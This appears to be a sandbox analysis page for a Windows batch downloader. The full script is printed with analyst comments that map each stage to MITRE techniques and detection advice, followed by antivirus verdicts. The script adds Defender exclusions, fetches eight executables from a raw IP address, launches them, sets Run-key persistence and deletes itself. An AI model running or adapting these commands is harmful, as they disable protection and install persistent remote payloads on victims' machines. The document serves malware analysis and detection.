Static | ZeroBOX
No static analysis available.
@echo off
REM ANALYST NOTE: this batch file is a downloader/dropper. In order, it creates
REM two staging directories, excludes them from Microsoft Defender scanning,
REM fetches eight executables over plain HTTP, launches them, registers each
REM one for logon persistence, and finally deletes itself. No step checks for
REM errors, so a failed step does not stop the steps after it.
REM
REM Stage 1 - staging directories. -Force makes New-Item succeed even when the
REM directory already exists. Both paths sit directly under the C: root.
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\ProgramLogs'"
REM Stage 2 - defense evasion, MITRE technique T1562.001. Both staging
REM directories are added as Defender exclusion paths before anything is
REM written into them. Add-MpPreference normally needs an elevated session;
REM whether this script runs elevated is not visible here.
REM Detection: Defender operational log event 5007 records configuration
REM changes such as new exclusions. Alert on exclusions that point at newly
REM created root-level directories.
powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramLogs'"
REM Stage 3 - ingress tool transfer, MITRE technique T1105. Eight executables
REM are pulled from a single host addressed by raw IP over unencrypted HTTP,
REM with no hash or signature check on what arrives. The file names imitate
REM antivirus and Microsoft components, which is masquerading, T1036. The
REM original comment here mentioned main.exe, which matches none of the files
REM actually fetched.
REM Detection: powershell.exe started by cmd.exe running Invoke-WebRequest with
REM an -OutFile ending in .exe, plus proxy or firewall logs for the host and
REM URL path below.
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftNetwork.exe' -OutFile 'C:\ProgramLogs\MicrosoftNetwork.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftRegistry.exe' -OutFile 'C:\ProgramLogs\MicrosoftRegistry.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftSecurity.exe' -OutFile 'C:\ProgramLogs\MicrosoftSecurity.exe'"
powershell -Command "Invoke-WebRequest 'http://80.76.49.148/LgGFdDAm2/MicrosoftValidator.exe' -OutFile 'C:\ProgramLogs\MicrosoftValidator.exe'"
REM Stage 4 - execution. start launches each payload without waiting for it to
REM exit; the empty quoted string is the window-title argument. What the
REM payloads do cannot be determined from this script.
start "" "C:\RM\AntiVirus.exe"
start "" "C:\RM\AntiVirus2.exe"
start "" "C:\RM\AntiVirus3.exe"
start "" "C:\RM\AntiVirus4.exe"
start "" "C:\ProgramLogs\MicrosoftNetwork.exe"
start "" "C:\ProgramLogs\MicrosoftRegistry.exe"
start "" "C:\ProgramLogs\MicrosoftSecurity.exe"
start "" "C:\ProgramLogs\MicrosoftValidator.exe"
REM Stage 5 - persistence, MITRE technique T1547.001. Values MainProgram1 to
REM MainProgram8 are written under the current user's Run key, so every
REM payload is started again at each logon of that user. Writing to HKCU needs
REM no administrative rights, and /f overwrites existing values without a
REM prompt.
REM Detection: registry value-set telemetry on this key, for example Sysmon
REM event 13. Remediation has to remove these eight values as well as both
REM staging directories and the two Defender exclusions.
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram3" /t REG_SZ /d "C:\RM\AntiVirus3.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram4" /t REG_SZ /d "C:\RM\AntiVirus4.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram5" /t REG_SZ /d "C:\ProgramLogs\MicrosoftNetwork.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram6" /t REG_SZ /d "C:\ProgramLogs\MicrosoftRegistry.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram7" /t REG_SZ /d "C:\ProgramLogs\MicrosoftSecurity.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram8" /t REG_SZ /d "C:\ProgramLogs\MicrosoftValidator.exe" /f
REM Disabled leftover: the next line is commented out and names lander2.vbs,
REM which nothing else in this script uses. It may point to an earlier stage
REM of the same chain - unconfirmed.
REM del %TEMP%\lander2.vbs
REM Stage 6 - indicator removal, MITRE technique T1070.004. The final line
REM ends batch processing quietly and then deletes this script from disk, so
REM the file is usually gone by the time of triage. Rely on process-creation
REM and PowerShell script-block logging rather than on recovering the file.
(goto) 2>nul & del "%~f0"
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Backdoor.zq
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDownloader.Agent.GEI
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.MNT.Boxter.928.2802D7D3
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.MNT.Boxter.928.2802D7D3
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.MNT.Boxter.928.2802D7D3
TrendMicro Clean
FireEye Heur.BZC.MNT.Boxter.928.2802D7D3
Emsisoft Heur.BZC.MNT.Boxter.928.2802D7D3 (B)
GData Heur.BZC.MNT.Boxter.928.2A4E69C7
Jiangmin Clean
Varist Clean
Avira Clean
MAX malware (ai score=81)
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.MNT.Boxter.928.2802D7D3 [many]
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Clean
Panda Clean
CrowdStrike Clean
alibabacloud Trojan[downloader]:Win/BZC.MTB
No IRMA results available.